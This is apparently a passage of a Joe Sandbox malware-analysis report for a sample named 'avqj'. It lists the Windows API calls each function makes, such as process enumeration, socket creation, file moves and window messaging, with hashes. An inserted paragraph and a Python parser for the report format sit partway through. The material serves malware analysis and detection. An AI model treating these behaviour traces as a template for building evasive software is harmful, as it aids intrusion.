                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 826366716-0
                                              APIs
                                                • Part of subcall function 00EEE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EED6E2,?), ref: 00EEE629
                                                • Part of subcall function 00EEE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EED6E2,?), ref: 00EEE642
                                                • Part of subcall function 00EEE9C5: GetFileAttributesW.KERNELBASE(?,00EED755), ref: 00EEE9C6
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00EEEC9F
                                              • MoveFileW.KERNEL32(?,?), ref: 00EEECD8
                                              • _wcslen.LIBCMT ref: 00EEEE17
                                              • _wcslen.LIBCMT ref: 00EEEE2F
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00EEEE7C
                                              Similarity
                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                              • String ID:
                                              • API String ID: 3183298772-0
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              APIs
                                              • GetInputState.USER32 ref: 00EF4225
                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EF427C
                                              • TranslateMessage.USER32(?), ref: 00EF42A5
                                              • DispatchMessageW.USER32(?), ref: 00EF42AF
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF42C0
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                              • String ID:
                                              • API String ID: 2256411358-0
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00EE21A5
                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00EE2251
                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00EE2259
                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00EE226A
                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00EE2272
                                              Similarity
                                              • API ID: MessagePostSleep$RectWindow
                                              • String ID:
                                              • API String ID: 3382505437-0
                                              APIs
                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F160A4
                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F160FC
                                              • _wcslen.LIBCMT ref: 00F1610E
                                              • _wcslen.LIBCMT ref: 00F16119
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F16175
                                              Similarity
                                              • API ID: MessageSend$_wcslen
                                              • String ID:
                                              • API String ID: 763830540-0
                                              APIs
                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?,?,00EE0BEE), ref: 00EE08BB
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE08D6
                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE08E4
                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?), ref: 00EE08F4
                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EE07D1,80070057,?,?), ref: 00EE0900
                                              Similarity
                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                              • String ID:
                                              • API String ID: 3897988419-0
                                              APIs
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BE0
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BED
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0BFA
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C07
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C14
                                              • CloseHandle.KERNEL32(?,?,?,?,00EF0A39,?,00EF3C56,?,00000001,00EC3ACE,?), ref: 00EF0C21
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID:
                                              • API String ID: 2962429428-0
                                              APIs
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE64E7
                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EE64FE
                                              • MessageBeep.USER32(00000000), ref: 00EE6516
                                              • KillTimer.USER32(?,0000040A), ref: 00EE6532
                                              • EndDialog.USER32(?,00000001), ref: 00EE654C
                                              Similarity
                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                              • String ID:
                                              • API String ID: 3741023627-0
                                              APIs
                                              • _free.LIBCMT ref: 00EB264E
                                                • Part of subcall function 00EB2D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBDB71,00F51DC4,00000000,00F51DC4,00000000,?,00EBDB98,00F51DC4,00000007,00F51DC4,?,00EBDF95,00F51DC4), ref: 00EB2D6E
                                                • Part of subcall function 00EB2D58: GetLastError.KERNEL32(00F51DC4,?,00EBDB71,00F51DC4,00000000,00F51DC4,00000000,?,00EBDB98,00F51DC4,00000007,00F51DC4,?,00EBDF95,00F51DC4,00F51DC4), ref: 00EB2D80
                                              • _free.LIBCMT ref: 00EB2660
                                              • _free.LIBCMT ref: 00EB2673
                                              • _free.LIBCMT ref: 00EB2684
                                              • _free.LIBCMT ref: 00EB2695
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              APIs
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EECAC6
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 00EECB0C
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F52990,01116050), ref: 00EECB55
                                              Similarity
                                              • API ID: Menu$Delete$InfoItem
                                              • String ID: 0
                                              • API String ID: 135850232-4108050209
                                              • Opcode ID: e7e2d524fa4ac479a43bf82be8ed7b5f3c7b01af5bf5f686c1074604a4f9b565
                                              • Instruction ID: 8e2aedd03aa38dadb41f7d56f3f6f8f294a1b2b03932b9087afc869b6e5168b6
                                              • Opcode Fuzzy Hash: e7e2d524fa4ac479a43bf82be8ed7b5f3c7b01af5bf5f686c1074604a4f9b565
                                              • Instruction Fuzzy Hash: C841F5312053859FD720DF29CC46F5ABBE8AF84324F245A2DF965A72D1D770E806CB92
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F1DCD0,00000000,?,?,?,?), ref: 00F14E09
                                              • GetWindowLongW.USER32 ref: 00F14E26
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F14E36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$Long
                                              • String ID: SysTreeView32
                                              • API String ID: 847901565-1698111956
                                              • Opcode ID: cf12e6e239de63517c96860523d0d4b9234ac7fff30a5727b1b1c8c1a0e218b5
                                              • Instruction ID: 344cbc620c5f473b3449d30255c535b95d3c57b14afcdb8a94e7bf7355338f22
                                              • Opcode Fuzzy Hash: cf12e6e239de63517c96860523d0d4b9234ac7fff30a5727b1b1c8c1a0e218b5
                                              • Instruction Fuzzy Hash: 09318F31600209AFDF219F78DC45BEA7BA9FB89334F204715F979A21E0D730E891AB50
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F1489F
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F148B3
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F148D7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: d97c02a387b3f6a86e23a5d383e7fc801ffd49a1dac4b26c12e0b507d19e4f38
                                              • Instruction ID: 85512cd556c173c45dee20b9d0c79f575e8846eff44224eeae2e8a1a66b658e0
                                              • Opcode Fuzzy Hash: d97c02a387b3f6a86e23a5d383e7fc801ffd49a1dac4b26c12e0b507d19e4f38
                                              • Instruction Fuzzy Hash: 73219132600219AFDF158F90CC46FEA3BB9EF88724F150114FA156B1D0D6B5B895ABA0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F15064
                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F15072
                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F15079
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyWindow
                                              • String ID: msctls_updown32
                                              • API String ID: 4014797782-2298589950
                                              • Opcode ID: 766233ab8128873aa497bf4aec52095008b470aeecef4b34e90535fc4abd9f56
                                              • Instruction ID: d34065f8fdb56711232f95b2c3edfb7e40c7a4c6eba9a8d60fba32ddf03655f5
                                              • Opcode Fuzzy Hash: 766233ab8128873aa497bf4aec52095008b470aeecef4b34e90535fc4abd9f56
                                              • Instruction Fuzzy Hash: 3E2192B5600209AFDB11DF54DC81DAB37ECEF9A7A4B000559FA049B361CB31EC51EB60
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F1419F
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F141AF
                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F141D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: 72c2096d2dc86c54143434719bf7b5a049bf96671a4b41aa8177a1a26ff9e009
                                              • Instruction ID: 411c2cc9a881de412994ca02910893d58fb4cb5742e92dea99decfa0ef992817
                                              • Opcode Fuzzy Hash: 72c2096d2dc86c54143434719bf7b5a049bf96671a4b41aa8177a1a26ff9e009
                                              • Instruction Fuzzy Hash: 8521C232610218BBEF128F54DC84EEB376EEFD9764F118114FA14AB190C671ACD2A7A0
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F14BAE
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F14BC3
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F14BD0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: 7e7932a7d55a9c3bc4f776142c33e22ef40e734c740cb0cba056af3523ac9722
                                              • Instruction ID: 3ba977d06ef0d0d3f89f24fab7dfcd6ae47337aa8b2fbce8e9ea4b84c2c6de84
                                              • Opcode Fuzzy Hash: 7e7932a7d55a9c3bc4f776142c33e22ef40e734c740cb0cba056af3523ac9722
                                              • Instruction Fuzzy Hash: 5B11E331244208BEEF119F65CC06FEB7BA8EFC5B64F114515FA55E60A0D671E861EB20
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F16220
                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00F1624D
                                              • DrawMenuBar.USER32(?), ref: 00F1625C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$InfoItem$Draw
                                              • String ID: 0
                                              • API String ID: 3227129158-4108050209
                                              • Opcode ID: 0d70929e8a739236e16f3384425ade4a82a5bb90925014706e7eef369c096438
                                              • Instruction ID: b319c5b0501e348bd0e166fdccfd3fc86e6461e1270c3d0e3a0796e7deb77420
                                              • Opcode Fuzzy Hash: 0d70929e8a739236e16f3384425ade4a82a5bb90925014706e7eef369c096438
                                              • Instruction Fuzzy Hash: 3B01AD32600218EFDF109F50DC84BEA7BB5FF49750F048095F849DA150CB308980EF20
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 31a38dbfffc168dc09367f4a0952bedc336341dbe0926af086550533e969d921
                                              • Instruction ID: 64a23ce9cf6dddcfcfd1e28ad35b054f55f7f5fc20ee59b7c6c2c54e977eb4b0
                                              • Opcode Fuzzy Hash: 31a38dbfffc168dc09367f4a0952bedc336341dbe0926af086550533e969d921
                                              • Instruction Fuzzy Hash: 54C18F75A0024AEFDB14CF95C894EAEB7B5FF88708F209598E405EB251D771EE81CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                              • Instruction ID: 2f0712eb8f3df9962f16676afe6ad1fd87a0bda96631a3ddcb2cf3532a4c5dea
                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                              • Instruction Fuzzy Hash: FFA134B2A002869FDB25CF58C891BEFBBE4EF55314F18516DE595BB2C3C6388942C750
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0E80
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0E98
                                              • CLSIDFromProgID.OLE32(?,?,00000000,00F1DCE0,000000FF,?,00000000,00000800,00000000,?,00F20BD4,?), ref: 00EE0EBD
                                              • _memcmp.LIBVCRUNTIME ref: 00EE0EDE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID:
                                              • API String ID: 314563124-0
                                              • Opcode ID: 8ba21210fd10ed2bcf0d4f54d29e92c7f303dda9b1e14298cd747d28740fbf16
                                              • Instruction ID: c1931f91ed8b9075f5bb4fe121e963d8be3214740ede60f8fc66b7101cf3ff9d
                                              • Opcode Fuzzy Hash: 8ba21210fd10ed2bcf0d4f54d29e92c7f303dda9b1e14298cd747d28740fbf16
                                              • Instruction Fuzzy Hash: F481E771A00109AFCF04DF95C984EEEB7B9EF89315F205568E506BB260DB71AE46CB60
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00F0B00B
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00F0B019
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00F0B0FB
                                              • CloseHandle.KERNEL32(00000000), ref: 00F0B10A
                                                • Part of subcall function 00E9E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00EC4D4D,?), ref: 00E9E30F
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                              • String ID:
                                              • API String ID: 1991900642-0
                                              • Opcode ID: b1fdae0184699e230c323f6524e6fc4ec55c4682eb18f97fd84f456c489fb811
                                              • Instruction ID: 14d3e893f37a2fcd529104ab53eb2eb36b858a4286452146fe9d3a04abc706f9
                                              • Opcode Fuzzy Hash: b1fdae0184699e230c323f6524e6fc4ec55c4682eb18f97fd84f456c489fb811
                                              • Instruction Fuzzy Hash: 6E515C71508300AFD710EF24C885A6BBBE8FF89754F40491DF989A72A1EB70E904DB92
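The API bullets in these entries follow one fixed shape (`Name.MODULE(args), ref: ADDR`, with an optional `Part of subcall function ADDR:` prefix for calls made one level down), so they can be parsed rather than read by eye. The following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small Python parser for those bullet lines, run over the six API lines of the entry above (copied in as constructed sample input), that checks for the CreateToolhelp32Snapshot / Process32FirstW / Process32NextW process-enumeration chain and decodes the CompareStringW arguments reached from it (Locale 0x409 is en-US; dwCmpFlags 0x1 is NORM_IGNORECASE, so a process-name comparison built on it matches regardless of case). The chain definition, the helper names and the NORM_IGNORECASE constant are mine; nothing here is taken from the sample's own code.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

# Constructed sample input: the six "APIs" bullet lines of the entry above,
# in the report's own format (addresses as printed there).
SAMPLE_ENTRY = """
• CreateToolhelp32Snapshot.KERNEL32 ref: 00F0B00B
• Process32FirstW.KERNEL32(00000000,?), ref: 00F0B019
  • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
• Process32NextW.KERNEL32(00000000,?), ref: 00F0B0FB
• CloseHandle.KERNEL32(00000000), ref: 00F0B10A
  • Part of subcall function 00E9E2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00EC4D4D,?), ref: 00E9E30F
"""

NORM_IGNORECASE = 0x1  # CompareStringW dwCmpFlags bit (winnls.h)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]          # raw argument tokens; "?" means unresolved
    ref: str                 # address of the call site
    subcall_of: Optional[str] = None  # set when the call is inside a subcall function

# One bullet line; the args group is absent when the plugin printed no arguments.
_LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[#\w]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one entry; lines that do not fit are skipped, not guessed."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a != ""]
        calls.append(ApiCall(m.group("name"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls

def matches_chain(calls: Sequence[ApiCall], chain: Sequence[str], include_subcalls: bool = False) -> bool:
    """True if the API names in `chain` occur in that order (as a subsequence) among the calls."""
    i = 0
    for c in calls:
        if not include_subcalls and c.subcall_of is not None:
            continue
        if i < len(chain) and c.name == chain[i]:
            i += 1
    return i == len(chain)

# The Toolhelp32 walk that AutoIt-style process lookups are built on (my chain definition).
PROCESS_ENUM_CHAIN = ("CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW")

def enumerates_processes_case_insensitively(calls: Sequence[ApiCall]) -> Tuple[bool, bool]:
    """(has the enumeration chain, does a reachable CompareStringW pass NORM_IGNORECASE)."""
    has_chain = matches_chain(calls, PROCESS_ENUM_CHAIN)
    ignore_case = any(
        c.name == "CompareStringW"
        and len(c.args) > 1
        and c.args[1] != "?"
        and int(c.args[1], 16) & NORM_IGNORECASE
        for c in calls
    )
    return has_chain, ignore_case

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_ENTRY)
    for c in parsed:
        where = f" (via subcall {c.subcall_of})" if c.subcall_of else ""
        print(f"{c.ref}: {c.module}!{c.name}({', '.join(c.args)}){where}")
    print("process enumeration chain, case-insensitive compare:",
          enumerates_processes_case_insensitively(parsed))
```

The subsequence match deliberately ignores calls made through subcall functions unless asked to include them, so a chain is only reported when the function itself issues the calls in order; the `_wcslen` and `CompareStringW` lines are still parsed and kept, with the address of the subcall they belong to, for the flag decoding.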
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00F0245A
                                              • WSAGetLastError.WSOCK32 ref: 00F02468
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F024E7
                                              • WSAGetLastError.WSOCK32 ref: 00F024F1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$socket
                                              • String ID:
                                              • API String ID: 1881357543-0
                                              • Opcode ID: 7815ec62c506f69198b1fae26364713faa51b1a778b85e507891ab33964c1251
                                              • Instruction ID: 3c0fccc4d8a88c2735d1719b4e8924c4814b74da12d6db0591a7810f4a8455d4
                                              • Opcode Fuzzy Hash: 7815ec62c506f69198b1fae26364713faa51b1a778b85e507891ab33964c1251
                                              • Instruction Fuzzy Hash: 1F41B174600201AFE720AF24C89AF2A77E5AB05714F54C488F95DAF2D3D772ED41DBA0
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00F16C41
                                              • ScreenToClient.USER32(?,?), ref: 00F16C74
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00F16CE1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
